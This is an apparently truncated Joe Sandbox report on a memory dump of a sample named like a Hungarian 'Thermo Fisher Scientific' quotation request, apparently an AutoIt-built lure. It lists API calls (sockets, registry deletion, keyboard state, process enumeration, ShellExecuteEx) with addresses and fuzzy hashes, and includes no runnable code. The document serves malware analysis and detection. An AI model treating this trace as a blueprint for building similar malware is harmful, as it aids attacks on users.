                                                              • Opcode Fuzzy Hash: f873f1eef36e8aa4079c846124a0c991df04771248ce1b7d7c4e60df81d189ef
                                                              • Instruction Fuzzy Hash: C1918C71204202AFCB45EF54C8A1B6EB7E6FF88314F04891DF996973A1DB34E945CB46
                                                              APIs
                                                              • select.WSOCK32 ref: 00659691
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0065969E
                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 006596C8
                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006596E9
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006596F8
                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 006597AA
                                                              • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0069DC00), ref: 00659765
                                                                • Part of subcall function 0063D2FF: _strlen.LIBCMT ref: 0063D309
                                                              • _strlen.LIBCMT ref: 00659800
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                              • String ID:
                                                              • API String ID: 3480843537-0
                                                              • Opcode ID: 3c56dbce9af76a2ceaad8aed62e2f16f93693e20fb48c4ba558198fa34a73a96
                                                              • Instruction ID: 7c641b4d78ddc0244427f1c68477d012b300677b112bcc505d48bf0326d20df7
                                                              • Opcode Fuzzy Hash: 3c56dbce9af76a2ceaad8aed62e2f16f93693e20fb48c4ba558198fa34a73a96
                                                              • Instruction Fuzzy Hash: E981FD71504200AFC754EF64CC85EABB7EAEF89710F144A1DF9559B2D2EB30D908CBA6
                                                              APIs
                                                              • __mtinitlocknum.LIBCMT ref: 0062A991
                                                                • Part of subcall function 00627D7C: __FF_MSGBANNER.LIBCMT ref: 00627D91
                                                                • Part of subcall function 00627D7C: __NMSG_WRITE.LIBCMT ref: 00627D98
                                                                • Part of subcall function 00627D7C: __malloc_crt.LIBCMT ref: 00627DB8
                                                              • __lock.LIBCMT ref: 0062A9A4
                                                              • __lock.LIBCMT ref: 0062A9F0
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,006B6DE0,00000018,00635E7B,?,00000000,00000109), ref: 0062AA0C
                                                              • EnterCriticalSection.KERNEL32(8000000C,006B6DE0,00000018,00635E7B,?,00000000,00000109), ref: 0062AA29
                                                              • LeaveCriticalSection.KERNEL32(8000000C), ref: 0062AA39
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                              • String ID:
                                                              • API String ID: 1422805418-0
                                                              • Opcode ID: b1aec62b3995814f9f84e149db1475b33d5664517167bdf50259a8e01e8157a5
                                                              • Instruction ID: 9934dde70f96abcb996c9064f85862585d4bdf30b0d9f5dd1e56f98d854b7e8b
                                                              • Opcode Fuzzy Hash: b1aec62b3995814f9f84e149db1475b33d5664517167bdf50259a8e01e8157a5
                                                              • Instruction Fuzzy Hash: 6C412971900A219BEB109FE8EA44BACB7B3AF01325F10431DE425AB2D1D7F49941CF96
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 00668EE4
                                                              • GetDC.USER32(00000000), ref: 00668EEC
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00668EF7
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00668F03
                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00668F3F
                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00668F50
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0066BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00668F8A
                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00668FAA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                              • String ID:
                                                              • API String ID: 3864802216-0
                                                              • Opcode ID: 45079f790ca6daa3e383708e5f26303d3b019b99151a75da9c4fcba88fba27e5
                                                              • Instruction ID: 391b6069b1d22f6054a3671a63338d3b6676b741fcaac5cc4777c0b83444aeed
                                                              • Opcode Fuzzy Hash: 45079f790ca6daa3e383708e5f26303d3b019b99151a75da9c4fcba88fba27e5
                                                              • Instruction Fuzzy Hash: A3314F72200214BFEF118F60CC49FEA3BAEEF49755F044265FE09DA291D6B59841CB74
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • GetSystemMetrics.USER32(0000000F), ref: 0067016D
                                                              • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0067038D
                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006703AB
                                                              • InvalidateRect.USER32(?,00000000,00000001,?), ref: 006703D6
                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006703FF
                                                              • ShowWindow.USER32(00000003,00000000), ref: 00670421
                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00670440
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                              • String ID:
                                                              • API String ID: 3356174886-0
                                                              • Opcode ID: 9a75312fa14054fad2b8643b931da56bf15419bf779e98dce371c83898e8eaa7
                                                              • Instruction ID: da97b4c9aaa6b66c88065264ff67491c7f45dd4e9695d639e6d7fa4abee50d12
                                                              • Opcode Fuzzy Hash: 9a75312fa14054fad2b8643b931da56bf15419bf779e98dce371c83898e8eaa7
                                                              • Instruction Fuzzy Hash: CEA19F35600616EBEB18CF68C9857FDBBB2BF04710F14C215EC58AB295D774AD51CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e25e048d9b29ebadcc12516eee9791f3223392297464fb2f95aada4cb631dd9d
                                                              • Instruction ID: 428c94d5dde4d506f2e3a168f63adcbe653d79bd03055d9b769c44ef349c3db6
                                                              • Opcode Fuzzy Hash: e25e048d9b29ebadcc12516eee9791f3223392297464fb2f95aada4cb631dd9d
                                                              • Instruction Fuzzy Hash: DC715E71901109EFCB14CF98CC49AEEBB76FF89314F188149F915AA251C7349A42CF65
                                                              APIs
                                                              • _memset.LIBCMT ref: 0066225A
                                                              • _memset.LIBCMT ref: 00662323
                                                              • ShellExecuteExW.SHELL32(?), ref: 00662368
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                                • Part of subcall function 0061C6F4: _wcscpy.LIBCMT ref: 0061C717
                                                              • CloseHandle.KERNEL32(00000000), ref: 0066242F
                                                              • FreeLibrary.KERNEL32(00000000), ref: 0066243E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                              • String ID: @
                                                              • API String ID: 4082843840-2766056989
                                                              • Opcode ID: 179b06ee44497f03ab5bab65805c48476bc4d2df7e991426000194526313b1b0
                                                              • Instruction ID: d287956bcc3338c40f1766e3a6fd853017e996937bcb9ea4aaa380274a7b8018
                                                              • Opcode Fuzzy Hash: 179b06ee44497f03ab5bab65805c48476bc4d2df7e991426000194526313b1b0
                                                              • Instruction Fuzzy Hash: 24715D74A0061A9FCF48EFA4C89199EBBF6FF48310F108559E855AB391DB34AD40CB94
                                                              APIs
                                                              • GetParent.USER32(00000000), ref: 00643C02
                                                              • GetKeyboardState.USER32(?), ref: 00643C17
                                                              • SetKeyboardState.USER32(?), ref: 00643C78
                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00643CA4
                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00643CC1
                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00643D05
                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00643D26
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: 1c646a4f68769035f42faf3c5fafa4e720d49eb7efb7d29f746c86cf856c9fba
                                                              • Instruction ID: 84dad5c0c49f1c3905d7680ef933f3e0923d6535a9b95df76ea1e281319e38d9
                                                              • Opcode Fuzzy Hash: 1c646a4f68769035f42faf3c5fafa4e720d49eb7efb7d29f746c86cf856c9fba
                                                              • Instruction Fuzzy Hash: 2D51E6A09047E53DFB3687248C56BFABFAB9F06304F088589E0D556BC2D694EE84D760
                                                              APIs
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00663DA1
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00663DCB
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00663E80
                                                                • Part of subcall function 00663D72: RegCloseKey.ADVAPI32(?), ref: 00663DE8
                                                                • Part of subcall function 00663D72: FreeLibrary.KERNEL32(?), ref: 00663E3A
                                                                • Part of subcall function 00663D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00663E5D
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00663E25
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                              • String ID:
                                                              • API String ID: 395352322-0
                                                              • Opcode ID: 77dc5d916bfac6baa7eb8ec4a51cbf941e68590254c843af2687410aeeefbb25
                                                              • Instruction ID: 8d052e331b6237154680abc3a1fbd7fededea37ca86fe9ff1c1d721081f39f56
                                                              • Opcode Fuzzy Hash: 77dc5d916bfac6baa7eb8ec4a51cbf941e68590254c843af2687410aeeefbb25
                                                              • Instruction Fuzzy Hash: CF310BB1911119BFDB159F90DC89EFFB7BEEF08300F10016AE512A2291D671AF499BB0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00668FE7
                                                              • GetWindowLongW.USER32(00BAFED0,000000F0), ref: 0066901A
                                                              • GetWindowLongW.USER32(00BAFED0,000000F0), ref: 0066904F
                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00669081
                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006690AB
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 006690BC
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006690D6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$MessageSend
                                                              • String ID:
                                                              • API String ID: 2178440468-0
                                                              • Opcode ID: 3ef0dc2770bbd607a2d2813afa289f78a01ed31e796e873fbaa0762a9a90d10d
                                                              • Instruction ID: ac10405084fcecb3453daedab83e67708a667d7a493285516e080fe48569914c
                                                              • Opcode Fuzzy Hash: 3ef0dc2770bbd607a2d2813afa289f78a01ed31e796e873fbaa0762a9a90d10d
                                                              • Instruction Fuzzy Hash: 65312434600215EFDB208F59DC84FA437ABFB4A718F141269F9198F2B2CB71A880DB61
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006408F2
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00640918
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0064091B
                                                              • SysAllocString.OLEAUT32(?), ref: 00640939
                                                              • SysFreeString.OLEAUT32(?), ref: 00640942
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00640967
                                                              • SysAllocString.OLEAUT32(?), ref: 00640975
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: 2326dcf70c5240f27dd8ddd54453c32a3f9d6f1f3167c198514a4d1a278dd8a4
                                                              • Instruction ID: 909b3f9f82f63b1f254e23ee1f250676a8a1b4def4549ab8dffefea88253ec0b
                                                              • Opcode Fuzzy Hash: 2326dcf70c5240f27dd8ddd54453c32a3f9d6f1f3167c198514a4d1a278dd8a4
                                                              • Instruction Fuzzy Hash: 83219776601219BFEB10AF78DC88DEB73EDEF09360B048126FA15DB291D670EC458760
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                              • API String ID: 1038674560-2734436370
                                                              • Opcode ID: 1a424946a69d289494dc0913b7abf233b489b6b180058496197eeac7f6eebbd4
                                                              • Instruction ID: 310037f97d508c7bdab9bf7c823bdff8b0bb319283db6ce3d6b644dd68d68760
                                                              • Opcode Fuzzy Hash: 1a424946a69d289494dc0913b7abf233b489b6b180058496197eeac7f6eebbd4
                                                              • Instruction Fuzzy Hash: 67216A71244512B7C724AB34DD22FFB73DBEF65310FB44029F44697182E6659982C3A8
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006409CB
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006409F1
                                                              • SysAllocString.OLEAUT32(00000000), ref: 006409F4
                                                              • SysAllocString.OLEAUT32 ref: 00640A15
                                                              • SysFreeString.OLEAUT32 ref: 00640A1E
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00640A38
                                                              • SysAllocString.OLEAUT32(?), ref: 00640A46
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: df2b72c82173a49175a82525588a86d962e829d042b06a5cfd5fb8e69b2b11fb
                                                              • Instruction ID: ce9f60be7e97c1da1edbd890cb40c4848f30827c9131867ce21cede56a401942
                                                              • Opcode Fuzzy Hash: df2b72c82173a49175a82525588a86d962e829d042b06a5cfd5fb8e69b2b11fb
                                                              • Instruction Fuzzy Hash: 0F218875600214BFEB10DFB8DC88DAA77EDEF083607048125FA09CB2A1DA70EC818B64
                                                              APIs
                                                                • Part of subcall function 0061D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0061D1BA
                                                                • Part of subcall function 0061D17C: GetStockObject.GDI32(00000011), ref: 0061D1CE
                                                                • Part of subcall function 0061D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0061D1D8
                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0066A32D
                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0066A33A
                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0066A345
                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0066A354
                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0066A360
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                              • String ID: Msctls_Progress32
                                                              • API String ID: 1025951953-3636473452
                                                              • Opcode ID: cb1f594d315df0b9e7da16db90288c67fbeb6b00731d7d8adb3fafe7f59768e3
                                                              • Instruction ID: a0c9bd95e1bb2a0589b8558fb4eb5b707ad4d6a4f4f9201978ff61b3add9de2d
                                                              • Opcode Fuzzy Hash: cb1f594d315df0b9e7da16db90288c67fbeb6b00731d7d8adb3fafe7f59768e3
                                                              • Instruction Fuzzy Hash: ED1193B1150219BEEF115FA0CC85EE77F6EFF09798F014114BA04A61A0C6729C21DBA4
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 0061CCF6
                                                              • GetWindowRect.USER32(?,?), ref: 0061CD37
                                                              • ScreenToClient.USER32(?,?), ref: 0061CD5F
                                                              • GetClientRect.USER32(?,?), ref: 0061CE8C
                                                              • GetWindowRect.USER32(?,?), ref: 0061CEA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Rect$Client$Window$Screen
                                                              • String ID:
                                                              • API String ID: 1296646539-0
                                                              • Opcode ID: 67082569c064f167b8094db36fec9ca38ba09b125dad0e8d0caaea6c3f0cac45
                                                              • Instruction ID: 13eebe4f444963c49485f3e5deabc6a372593a0bd52be445c81185ce1bb939ed
                                                              • Opcode Fuzzy Hash: 67082569c064f167b8094db36fec9ca38ba09b125dad0e8d0caaea6c3f0cac45
                                                              • Instruction Fuzzy Hash: 91B14979900249DBDF10CFA8C4807EDBBB2FF08310F189569EC59EB250DB31A995CB65
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00661C18
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00661C26
                                                              • __wsplitpath.LIBCMT ref: 00661C54
                                                                • Part of subcall function 00621DFC: __wsplitpath_helper.LIBCMT ref: 00621E3C
                                                              • _wcscat.LIBCMT ref: 00661C69
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00661CDF
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00661CF1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
